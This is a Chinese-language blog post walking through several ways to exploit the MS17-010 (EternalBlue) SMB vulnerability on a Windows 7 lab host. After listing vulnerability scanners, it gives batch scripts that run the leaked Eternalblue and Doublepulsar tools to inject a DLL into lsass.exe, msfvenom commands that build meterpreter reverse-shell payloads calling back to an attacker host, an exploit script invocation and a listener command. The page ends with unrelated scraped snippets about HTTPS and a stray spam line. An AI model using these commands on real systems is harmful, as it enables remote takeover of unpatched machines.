<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    淺談ms17-010多種利用方式

    VSole2022-12-19 10:12:36

    實驗化境介紹

    kali 系統:192.168.0.18

    win7 系統:192.168.0.28

    MS17-010漏洞檢查

    checker.py

    GitHub:https://github.com/worawit/MS17-010

    python2 checker.py 192.168.0.28
    

    check.bat

    GitHub:https://github.com/3gstudent/Smbtouch-Scanner

    @Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt
    

    check.bat 192.168.0.28

    Ladon

    Ladon.exe 192.168.0.28 MS17010
    

    fscan

    fscan -h 192.168.0.28
    

    MS17-010漏洞利用方式

    有防火墻

    https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

    無防火墻Github:

    https://github.com/x0rz/EQGRP_Lost_in_Translation

    將工具包中以下三個目錄中的文件拷貝到同一個目錄中(因為64位系統是支持32位的,所以直接復制32位的就好):

    windows\lib\x86-Windows\

    windows\specials\

    windows\payloads\

    然后在目錄中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改為Doublepulsar-1.3.1.xml

    為了方便使用,編寫bat腳本

    attack.bat 192.168.0.28
    @echo offecho =============== [ TargetIp: %1 ] ===============Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2
    backdoor.bat 192.168.0.28 exp.dll
    @echo offecho ================================================echo [info] TargetIp: %1echo [info] Architecture: %2echo [info] DllPayload: %3echo ================================================Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
    
    1. https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

    deps文件夾,在目錄中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改為Doublepulsar-1.3.1.xml

    編寫bat腳本,使用方法和上面一樣

    @echo offecho =============== [ TargetIp: %1 ] ===============Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt@echo offecho ================================================echo [info] TargetIp: %1echo [info] Architecture: %2echo [info] DllPayload: %3echo ================================================Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
    

    靶場環境實戰利用

    #metasploit生成dll文件msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll
    

    (1)poc檢查目標服務是否開存在MS17010漏洞

    2.攻擊

    3.漏洞利用

    metasploit上線

    利用二

    K8哥哥的ksmb.exe

    成功添加用戶

    利用三

    https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

    需要多次利用才能成功

    #生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode
    #利用python3 ms17-010.py --host 192.168.0.28 --file shellcode
    

    加上--port 445會報錯

    1.攻擊

    2.監聽后成功上線

    #一鍵啟動監聽
    msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.18; set lport 1111; exploit - j; "
    

    https
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    事實上,隨著網絡安全問題不斷凸顯,許多網站都已經開始使用HTTPS協議來進行數據傳輸,以防止數據的泄露或篡改。部署HTTPS加密證書成為保障網站安全必不可少的一步。那么HTTPS加密證書該如何獲取呢?獲取HTTPS加密證書又有什么好處?下文將為你詳細介紹。 HTTPS加密證書的獲取方法HTTPS證書獲取途徑有兩種:自己簽發和由受信任的CA機構簽發。 自己給自己簽發而來的證書也叫
    在互聯網上,我們在訪問常見的社交、購物、銀行等網站時,經常會看到這些網站是通過https訪問的,而要實現https訪問,就需要用到https證書。那么你知道https證書是什么?https證書有什么作用?又該怎么申請https證書嗎?本文內容就將詳細介紹。https證書是什么?https證書,也就是我們常說的SSL證書,它由受信任的數字證書頒發機構CA在驗證服務器身份后頒發,是一種用于保護網絡傳輸
    針對中東地區電信服務提供商的網絡攻擊是利用名為 HTTPSnoop 和 PipeSnoop 的新型惡意軟件實施的,這些惡意軟件允許網絡犯罪分子遠程控制這些感染了這種惡意軟件的設備。
    在如今的互聯網時代,網絡安全變得愈發重要。為了保障網站內數據的安全,許多網站都開始使用HTTPS協議來進行數據傳輸。而谷歌、百度等搜索巨擘啟用全站HTTPS加密服務,更是掀起了網站HTTPS加密的浪潮。那么申請HTTPS證書都需要什么?該如何申請呢?下文將為你詳細解答,一起來看看吧。 HTTPS證書如何申請?目前,企業一般是選擇證書機構來進行證書申請,這主要是因為專業的服務和技術團隊會使
    01結論SSLv1.0 無法防止重放(Replay)攻擊。SSLv2.0 以及升級版SSL3.0、TLS1.
    自從Mozilla、Google、微軟聯手提高HTTPS在網絡上的采用率后,HTTPS強制擴展就變成了不必要的。因此,啟用純HTTPS模式設置是用戶今后在網絡瀏覽器中需要做的所有事情,他們現在可以刪除HTTPS everywhere擴展。"HTTPS everywhere的目標始終是成為多余的。"EFF表示,HTTPS Everywhere將在整個2022年處于維護模式。
    1、基礎知識1.1 對稱加密算法對稱加密算法的特點是加密密鑰和解密密鑰是同一把密鑰K,且加解密速度快,典型的
    假設A和B通信,B把證書傳給A。此時被中間人O攔截到證書,中間人備份一份后發給A。A驗證證書也無誤。那中間人
    近日,Google宣布從Chrome網絡瀏覽器的下一個穩定版本(90)開始,將為地址欄中輸入的所有URL網址默認選擇HTTPS協議。這項功能于上個月進入測試階段,并且是針對Chrome Canary、Dev或Beta版用戶的有限實驗的一部分。
    自上海疫情發生以來,許多企業應防疫要求而居家辦公,導致部分企業無法正常提交SSL證書的申請、續費流程。為幫助企業網站的安全運行,上海銳成特此推出“銳安信SSL證書免費送”的限時活動,全力保護網站以及消費者的數據安全,避免證書過期給企業帶來不安全風險及損失。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类